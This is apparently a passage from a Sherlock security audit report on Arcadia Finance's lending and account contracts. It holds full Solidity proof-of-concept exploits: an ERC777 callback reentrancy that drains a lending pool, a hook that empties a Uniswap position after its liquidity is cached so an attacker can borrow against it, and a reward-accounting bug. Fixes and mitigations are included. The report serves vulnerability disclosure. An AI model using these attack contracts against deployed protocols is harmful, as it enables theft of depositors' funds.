  3. Replace the contents inside lib/accounts-v2/test/fuzz/Fuzz.t.sol with the code found in this github gist.

  4. To finish the setup, replace the file found in lending-v2/test/fuzz/Fuzz.t.sol with the code found in this github gist.

  5. For the actual proof of concept, create a Poc.t.sol file in test/fuzz/LendingPool and paste the following code. The code contains the proof of concept test, as well as the action target implementation:

    /**
     * Created by Pragma Labs
     * SPDX-License-Identifier: BUSL-1.1
     */
    pragma solidity 0.8.22;
    
    import { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";
    
    import { ActionData, IActionBase } from "../../../lib/accounts-v2/src/interfaces/IActionBase.sol";
    import { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";
    
    /// @notice Proof of Concept - Arcadia
    contract Poc is LendingPool_Fuzz_Test {
    
        /////////////////////////////////////////////////////////////////
        //                        TEST CONTRACTS                       //
        /////////////////////////////////////////////////////////////////
    
        ActionHandler internal actionHandler;
        bytes internal callData;
    
        /////////////////////////////////////////////////////////////////
        //                          SETUP                              //
        /////////////////////////////////////////////////////////////////
    
        function setUp() public override {
            // Setup pool test
            LendingPool_Fuzz_Test.setUp();
    
            // Deploy action handler
            vm.prank(users.creatorAddress);
            actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));
    
            // Set origination fee
            vm.prank(users.creatorAddress);
            pool.setOriginationFee(100); // 1%
    
            // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool 
            vm.startPrank(users.liquidityProvider);
            mockERC20.token777.transfer(address(actionHandler), 1 ether);
            mockERC20.token777.approve(address(pool), type(uint256).max);
    
            // Deposit 100 erc777 tokens into pool
            vm.startPrank(address(srTranche));
            pool.depositInLendingPool(100 ether, users.liquidityProvider);
            assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);
    
            // Approve creditor from actiontarget for bid payment
            vm.startPrank(address(actionHandler));
            mockERC20.token777.approve(address(pool), type(uint256).max);
    
        }
    
        /////////////////////////////////////////////////////////////////
        //                           POC                               //
        /////////////////////////////////////////////////////////////////
        /// @notice Test exploiting the reentrancy vulnerability. 
        /// Prerequisites:
        /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the 
        ///   borrowed funds in the flash action.
        /// - Have some liquidity deposited in the pool in order to be able to borrow it
        /// Attack:
        /// 1. Open a margin account in the creditor to be exploited.
        /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured
        /// in the registry for the given creditor.
        /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,
        /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.
        /// 4. Trigger LendingPool.flashAction(). The execution flow will:
        ///     a. Mint the flash-actioned debt to the account
        ///     b. Send the borrowed funds to the action target
        ///     c. The action target will execute the ERC777 `tokensReceived()` callback, which will:
        ///        - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state
        ///        - Trigger Liquidator.bid(). 
     
        function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(
            uint128 amountLoaned,
            uint112 collateralValue,
            uint128 liquidity,
            uint8 originationFee
        ) public {   
    
            //----------            STEP 1            ----------//
            // Open a margin account
            vm.startPrank(users.accountOwner);
            proxyAccount.openMarginAccount(address(pool)); 
            
            //----------            STEP 2            ----------//
            // Deposit 1 stable token in the account as collateral.
            // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because
            // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,
            // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the 
            // account's collateral value is not considered as 0.
            depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);
            assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);
    
            //----------            STEP 3            ----------//
            // Create empty action data. The action handler won't withdraw/deposit any asset from the account 
            // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.
            callData = _buildActionData();
    
            // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)
            // as well as the pool. 
            // Action handler balance initially has 1 token of token777 (given initially on deployment)
            assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);
            uint256 liquidityPoolBalanceBefore =  mockERC20.token777.balanceOf(address(pool));
            uint256 actionHandlerBalanceBefore =  mockERC20.token777.balanceOf(address(actionHandler));
            // Pool initially has 100 tokens of token777 (deposited by the liquidity provider in setUp())
            assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);
    
            //----------            STEP 4            ----------//
            // Step 4. Trigger the flash action.
            vm.startPrank(users.accountOwner);
    
            pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);
            vm.stopPrank();
     
            
            //----------       FINAL ASSERTIONS       ----------//
    
            // Action handler (who is the receiver of the borrowed funds in the flash action) has successfully obtained 100 tokens from
            // the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen
            // from the pool minus the small amount required to pay for the bid)
            assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);
    
            // On the other hand, the pool has lost nearly all of its balance; only the small amount paid by the
            // action handler in order to bid remains
            assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);
        
        } 
    
        /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` 
        /// callback when requesting a flash action
        function _buildActionData() internal returns(bytes memory) {
            ActionData memory emptyActionData;
            address[] memory to;
            bytes[] memory data;
            bytes memory actionTargetData = abi.encode(emptyActionData, to, data);
            IPermit2.PermitBatchTransferFrom memory permit;
            bytes memory signature;
            return abi.encode(emptyActionData, emptyActionData, permit, signature, actionTargetData);
        }
    }
    
    /// @notice ERC777Recipient interface
    interface IERC777Recipient {
       
        function tokensReceived(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external;
    }
    
     /// @notice Liquidator interface
    interface ILiquidator {
        function liquidateAccount(address account) external;
        function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;
    }
    
     /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback
    contract ActionHandler is IERC777Recipient, IActionBase {
    
        ILiquidator public immutable liquidator;
        address public immutable account;
        uint256 triggered;
    
        constructor(address _liquidator, address _account) {
            liquidator = ILiquidator(_liquidator);
            account = _account;
        }  
    
        /// @notice ERC777 callback function
        function tokensReceived(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external {
            // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)
            if(triggered == 1) {
                triggered = 2;
                liquidator.liquidateAccount(account);
                uint256[] memory askedAssetAmounts = new uint256[](1);
                askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt
                liquidator.bid(account, askedAssetAmounts, true);
            }
            unchecked {
                triggered++;
            }
        }
    
        function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {
            ActionData memory data;
            return data;
        }
    
    }
  6. Execute the proof of concept with the following command (being inside the lending-v2 folder): forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds

Impact

The impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L567

Tool used

Manual Review, foundry

Recommendation

This attack is possible because the getCollateralValue() function returns a 0 collateral value due to the minUsdValue mentioned before not being reached after executing the bid. The Liquidator’s _settleAuction() function then believes the collateral held in the account is 0.

In order to mitigate the issue, consider fetching the actual collateral value inside _settleAuction(), even if it is below the creditor’s minUsdValue, so that the function can properly check whether the full collateral was sold or not.

// Liquidator.sol
function _settleAuction(address account, AuctionInformation storage auctionInformation_)
        internal
        returns (bool success)
    {
        ...

        uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached
        
 
        ...
    }

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(2)

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#133.

Thomas-Smets

The fix consists of two PRs:

IAm0x52

Fix looks good. By triggering the transfer inside the callback, the account is now locked nonreentrant which prevents liquidation calls.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue H-3: Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positions

Source: #154

Found by

0xadrii, zzykxx

Summary

It is possible to fake the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.

Vulnerability Detail

When depositing into an account, the deposit() function is called, which calls the internal _deposit() function. Depositing is performed in two steps:

  1. The registry’s batchProcessDeposit() function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.
  2. The assets are transferred and deposited into the account.
// AccountV1.sol

function _deposit(
        address[] memory assetAddresses,
        uint256[] memory assetIds,
        uint256[] memory assetAmounts,
        address from
    ) internal {
        // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.
        // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.
        uint256[] memory assetTypes =
            IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);

        for (uint256 i; i < assetAddresses.length; ++i) {
            // Skip if amount is 0 to prevent storing addresses that have 0 balance.
            if (assetAmounts[i] == 0) continue;

            if (assetTypes[i] == 0) {
                if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();
                _depositERC20(from, assetAddresses[i], assetAmounts[i]);
            } else if (assetTypes[i] == 1) {
                if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();
                _depositERC721(from, assetAddresses[i], assetIds[i]);
            } else if (assetTypes[i] == 2) {
                _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);
            } else {
                revert AccountErrors.UnknownAssetType();
            }
        }

        if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {
            revert AccountErrors.TooManyAssets();
        }
    }

For Uniswap positions (and assuming that a creditor is set), calling batchProcessDeposit() will internally trigger the UniswapV3AM.processDirectDeposit():

// UniswapV3AM.sol

function processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)
        public
        override
        returns (uint256 recursiveCalls, uint256 assetType)
    {
        // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).
        // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.
        if (amount == 1) _addAsset(assetId);

        ...
    }

The Uniswap position will then be added to the protocol using the internal _addAsset() function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has at that moment. Such liquidity is obtained by directly querying the NonfungiblePositionManager contract:

function _addAsset(uint256 assetId) internal {
        ...

        (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);

        // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the
        // deposit functions and there any deposit of non-allowed Underlying Assets will revert.
        if (liquidity == 0) revert ZeroLiquidity();

        // The liquidity of the Liquidity Position is stored in the Asset Module,
        // not fetched from the NonfungiblePositionManager.
        // Since liquidity of a position can be increased by a non-owner,
        // the max exposure checks could otherwise be circumvented.
        assetToLiquidity[assetId] = liquidity;

        ...
    }

As the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e. the amount that the position is worth) will be computed using the _getPosition() internal function, which reads the cached liquidity value stored in the assetToLiquidity[assetId] mapping rather than directly consulting the NonfungiblePositionManager contract. This way, the position won’t be able to surpass the max exposures:

// UniswapV3AM.sol

function _getPosition(uint256 assetId)
        internal
        view
        returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)
    {
        // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,
        // not fetched from the NonfungiblePositionManager.
        // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.
        liquidity = uint128(assetToLiquidity[assetId]);

        if (liquidity > 0) {
            (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
        } else {
            // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.
            (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
        }
    }

However, storing the liquidity leads to an attack vector that allows Uniswap positions’ liquidity to be completely withdrawn while making the protocol believe that the Uniswap position is still full.

As mentioned in the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position’s liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.

The following steps show how the attack could be performed:

  1. Initially, a malicious contract must be created. This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777’s tokensToSend() hook.
  2. The malicious contract will call the account’s deposit() function with two assetAddresses to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.
  3. IRegistry(registry).batchProcessDeposit() will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the assetToLiquidity[assetId] mapping.
  4. After processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the tokensToSend() hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won’t be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the batchProcessDeposit() step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.
  5. Finally, following the transfer of the ERC777 token, the Uniswap position will be transferred and successfully deposited in the account. Arcadia will believe that the account holds a Uniswap position worth some liquidity, when in reality the position is empty.

Proof of Concept

This proof of concept shows how the previous attack can be performed so that the liquidity in the Uniswap position is 0, while the collateral value for the account is far greater than 0.

  1. Create an ERC777Mock.sol file in lib/accounts-v2/test/utils/mocks/tokens and paste the code found in this github gist.

  2. Import the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in lib/accounts-v2/test/utils/Types.sol to add an additional token777ToUsd oracle, a token777 of type ERC777Mock, and a token777ToUsd rate:

    import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this
    
    ...
    
    struct MockOracles {
        ArcadiaOracle stable1ToUsd;
        ArcadiaOracle stable2ToUsd;
        ArcadiaOracle token1ToUsd;
        ArcadiaOracle token2ToUsd;
        ArcadiaOracle token3ToToken4;
        ArcadiaOracle token4ToUsd;
        ArcadiaOracle token777ToUsd; // <----- Add this
        ArcadiaOracle nft1ToToken1;
        ArcadiaOracle nft2ToUsd;
        ArcadiaOracle nft3ToToken1;
        ArcadiaOracle sft1ToToken1;
        ArcadiaOracle sft2ToUsd;
    }
    
    struct MockERC20 {
        ERC20Mock stable1;
        ERC20Mock stable2;
        ERC20Mock token1;
        ERC20Mock token2;
        ERC20Mock token3;
        ERC20Mock token4;
        ERC777Mock token777; // <----- Add this
    }
    
    ...
    
    struct Rates {
        uint256 stable1ToUsd;
        uint256 stable2ToUsd;
        uint256 token1ToUsd;
        uint256 token2ToUsd;
        uint256 token3ToToken4;
        uint256 token4ToUsd;
        uint256 token777ToUsd; // <----- Add this
        uint256 nft1ToToken1;
        uint256 nft2ToUsd;
        uint256 nft3ToToken1;
        uint256 sft1ToToken1;
        uint256 sft2ToUsd;
    }
  3. Replace the contents of lib/accounts-v2/test/fuzz/Fuzz.t.sol with the code found in this github gist.

  4. The next step is to replace the file found in lending-v2/test/fuzz/Fuzz.t.sol with the code found in this github gist.

  5. Create a PocUniswap.t.sol file in lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol and paste the following code snippet into it:

    /**
     * Created by Pragma Labs
     * SPDX-License-Identifier: BUSL-1.1
     */
    pragma solidity 0.8.22;
    
    import { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";
    
    import { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";
    import { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from "../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol";
    import { ERC20Mock } from "../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol";
    
    import "forge-std/console.sol";
    
    interface IERC721 {
        function ownerOf(uint256 tokenid) external returns(address);
        function approve(address spender, uint256 tokenId) external;
    }
     
    /// @notice Proof of Concept - Arcadia
    contract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { 
    
        /////////////////////////////////////////////////////////////////
        //                         CONSTANTS                           //
        /////////////////////////////////////////////////////////////////
        int24 private MIN_TICK = -887_272;
        int24 private MAX_TICK = -MIN_TICK;
    
        /////////////////////////////////////////////////////////////////
        //                          STORAGE                            //
        /////////////////////////////////////////////////////////////////
        AccountOwner public accountOwnerContract;
        ERC20Mock token0;
        ERC20Mock token1;
        uint256 tokenId;
    
        /////////////////////////////////////////////////////////////////
        //                          SETUP                              //
        /////////////////////////////////////////////////////////////////
    
        function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {
            // Setup pool test
            LendingPool_Fuzz_Test.setUp();
    
            // Deploy fixture for Uniswap.
            UniswapV3Fixture.setUp();
    
            deployUniswapV3AM(address(nonfungiblePositionManager));
    
            vm.startPrank(users.riskManager);
            registryExtension.setRiskParametersOfDerivedAM(
                address(pool), address(uniV3AssetModule), type(uint112).max, 100
            );
     
            token0 = mockERC20.token1;
            token1 = mockERC20.token2;
            (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);
    
            // Deploy account owner
            accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));
    
            
            // Set origination fee
            vm.startPrank(users.creatorAddress);
            pool.setOriginationFee(100); // 1%
    
            // Transfer ownership to Account Owner 
            vm.startPrank(users.accountOwner);
            factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));
            vm.stopPrank();
            
    
            // Mint uniswap position underlying tokens to accountOwnerContract
            mockERC20.token1.mint(address(accountOwnerContract), 100 ether);
            mockERC20.token2.mint(address(accountOwnerContract), 100 ether);
    
            // Open Uniswap position 
            tokenId = _openUniswapPosition();
     
    
            // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account
             vm.startPrank(users.liquidityProvider);
             mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);
        }
    
        /////////////////////////////////////////////////////////////////
        //                           POC                               //
        /////////////////////////////////////////////////////////////////
        /// @notice Test exploiting the reentrancy vulnerability. 
        function testVuln_borrowUsingUndercollateralizedUniswapPosition(
            uint128 amountLoaned,
            uint112 collateralValue,
            uint128 liquidity,
            uint8 originationFee
        ) public {   
    
            //----------            STEP 1            ----------//
            // Open margin account setting pool as new creditor
            vm.startPrank(address(accountOwnerContract));
            proxyAccount.openMarginAccount(address(pool)); 
            
            //----------            STEP 2            ----------//
            // Deposit assets into account. The order of the assets to be deposited is important. The first asset will be an ERC777 token that triggers the callback on transferring.
            // The second asset will be the uniswap position.
    
            address[] memory assetAddresses = new address[](2);
            assetAddresses[0] = address(mockERC20.token777);
            assetAddresses[1] = address(nonfungiblePositionManager);
            uint256[] memory assetIds = new uint256[](2);
            assetIds[0] = 0;
            assetIds[1] = tokenId;
            uint256[] memory assetAmounts = new uint256[](2);
            assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback
            assetAmounts[1] = 1;
            // Set approvals
            IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);
            mockERC20.token777.approve(address(proxyAccount), type(uint256).max);
    
            // Perform deposit. 
            // Deposit will perform two steps:
            // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position
            // will be stored in the `assetToLiquidity` mapping.
            // 2. Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ERC777 collateral will be transferred. 
            // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap 
            // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality
            // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. 
            proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);
    
            //----------       FINAL ASSERTIONS       ----------//
            // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. This does not reflect that the position is empty,
            // hence it is possible to borrow with an empty uniswap position.
            uint256 finalCollateralValue = proxyAccount.getCollateralValue();
    
            // Liquidity in the position is 0.
            (
                ,
                ,
                ,
                ,
                ,
                ,
                ,
                uint128 positionLiquidity, // liquidity currently left in the position
                ,
                ,
                ,
            ) = nonfungiblePositionManager.positions(tokenId); 
    
            console.log("Collateral value of account:", finalCollateralValue);
            console.log("Actual liquidity in position", liquidity);
    
            assertEq(positionLiquidity, 0);
            assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000
        } 
    
        function _openUniswapPosition() internal returns(uint256 tokenId) {
            vm.startPrank(address(accountOwnerContract));
           
            uint160 sqrtPriceX96 = uint160(
                calculateAndValidateRangeTickCurrent(
                    10 * 10**18, // priceToken0
                    20 * 10**18 // priceToken1
                )
            );
    
            // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.
            IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);
    
            // Approve liquidity
            mockERC20.token1.approve(address(uniswapPool), type(uint256).max);
            mockERC20.token2.approve(address(uniswapPool), type(uint256).max);
    
            // Mint liquidity position.
            uint128 liquidity = 100 * 10**18;
            tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);
     
            assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));
        }
     
    }
    
    /// @notice ERC777Sender interface
    interface IERC777Sender {
        /**
         * @dev Called by an {IERC777} token contract whenever a registered holder's
         * (`from`) tokens are about to be moved or destroyed. The type of operation
         * is conveyed by `to` being the zero address or not.
         *
         * This call occurs _before_ the token contract's state is updated, so
         * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.
         *
         * This function may revert to prevent the operation from being executed.
         */
        function tokensToSend(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external;
    }
    
    interface INonfungiblePositionManager {
         function positions(uint256 tokenId)
            external
            view
            returns (
                uint96 nonce,
                address operator,
                address token0,
                address token1,
                uint24 fee,
                int24 tickLower,
                int24 tickUpper,
                uint128 liquidity,
                uint256 feeGrowthInside0LastX128,
                uint256 feeGrowthInside1LastX128,
                uint128 tokensOwed0,
                uint128 tokensOwed1
            );
    
        struct DecreaseLiquidityParams {
            uint256 tokenId;
            uint128 liquidity;
            uint256 amount0Min;
            uint256 amount1Min;
            uint256 deadline;
        }
        function decreaseLiquidity(DecreaseLiquidityParams calldata params)
            external
            payable
            returns (uint256 amount0, uint256 amount1);
    }
    
     /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback
    contract AccountOwner is IERC777Sender  {
    
            INonfungiblePositionManager public nonfungiblePositionManager;
    
            constructor(address _nonfungiblePositionManager) {
                nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);
            }
    
         function tokensToSend(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external {
            // Remove liquidity from Uniswap position
           (
                ,
                ,
                ,
                ,
                ,
                ,
                 ,
                uint128 liquidity,
                ,
                ,
                ,
            ) = nonfungiblePositionManager.positions(1); // tokenId 1
    
            INonfungiblePositionManager.DecreaseLiquidityParams memory params = INonfungiblePositionManager.DecreaseLiquidityParams({
                tokenId: 1,
                liquidity: liquidity,
                amount0Min: 0,
                amount1Min: 0,
                deadline: block.timestamp
            });
            nonfungiblePositionManager.decreaseLiquidity(params);
        }
      
    
        function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {
            return bytes4(abi.encodeWithSignature("onERC721Received(address,address,uint256,bytes)"));
        }
    
    }
  6. Execute the following command from inside the lending-v2 folder: forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv.

NOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry’s vm.getCode() and we are importing the deployment file from the accounts-v2 repo to the lending-v2 repo, which makes foundry throw some errors. To fix this, just compile the contracts in the accounts-v2 repo and copy the missing folders from the accounts-v2/out generated folder into the lending-v2/out folder.

Impact

High. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/UniswapV3/UniswapV3AM.sol#L107

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol#L844

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol#L855

Tool used

Manual Review

Recommendation

There are several ways to mitigate this issue. One option is to transfer each asset at the moment it is processed, instead of first processing all assets (and caching the Uniswap liquidity) and only then transferring them. Another option is to perform a liquidity check after depositing the Uniswap position, ensuring that the liquidity stored in the assetToLiquidity[assetId] mapping matches the value returned by the NonFungiblePositionManager.
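A rough sketch of the second option (illustrative only; where exactly this check should live in the deposit flow is an assumption):

// Hedged sketch: after the asset transfers of deposit() have completed, re-read the position's
// liquidity and require it to still match the value cached during batchProcessDeposit().
(,,,,,,, uint128 currentLiquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
require(currentLiquidity == assetToLiquidity[assetId], "UniV3AM: liquidity changed during deposit");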

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(2)

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#174.

IAm0x52

Fix looks good. AccountV1.sol will now transfer all assets prior to valuing them.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-1: Stargate STG rewards are accounted incorrectly by StakedStargateAM.sol

Source: #38

Found by

0xVolodya, 0xrice.cooker, AuditorPraise, FCSE507, Hajime, Tricko, ast3ros, cu5t0mPe0, deth, ge6a, infect3d, mstpr-brainbot, pash0k, pkqs90, rvierdiiev, zzykxx

Summary

Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time deposit() is called but StakedStargateAM does not take it into account.

Vulnerability Detail

When either mint() or increaseLiquidity() is called, the assetState[asset].lastRewardGlobal variable is not reset to 0, even though the rewards have already been transferred and accounted for on Stargate's side.

After a call to mint() or increaseLiquidity(), any subsequent call to mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf() (which all internally call _getRewardBalances()) will either revert due to underflow or account for fewer rewards than it should, because assetState_.lastRewardGlobal has not been correctly reset to 0 while currentRewardGlobal (which is fetched from Stargate) has:

uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌
function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
}
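To make the failure mode concrete (values are illustrative): right after mint() or increaseLiquidity() triggers Stargate's claim, pendingEmissionToken() returns $0$ while lastRewardGlobal still holds the pre-claim value $R > 0$, so the next update computes $deltaReward = 0 - R < 0$ and reverts on underflow; once new emissions grow back past $R$ the call succeeds, but those first $R$ tokens are never credited to any position.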

POC

To copy-paste in USDbCPool.fork.t.sol:

function testFork_WrongRewards() public {
    uint256 initBalance = 1000 * 10 ** USDbC.decimals();
    // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.
    vm.startPrank(users.accountOwner);
    deal(address(USDbC), users.accountOwner, initBalance);

    USDbC.approve(address(router), initBalance);
    router.addLiquidity(poolId, initBalance, users.accountOwner);
    // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);

    // And : The user stakes the LP token via the StargateAssetModule
    uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);
    ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);
    uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);

    //We let 10 days pass to accumulate rewards.
    vm.warp(block.timestamp + 10 days);

    // User increases liquidity of the position.
    uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.increaseLiquidity(tokenId, 1);

    vm.expectRevert();
    stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow

    //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed
    vm.warp(block.timestamp + 10 days);
    uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.burn(tokenId);

    assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.
    vm.stopPrank();
}

Impact

Users will not be able to take any action on their positions until currentRewardGlobal is greater than or equal to assetState_.lastRewardGlobal. After that they will be able to perform actions, but their positions will account for fewer rewards than they should, because a total of assetState_.lastRewardGlobal rewards is nullified.

This will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.

Code Snippet

Tool used

Manual Review

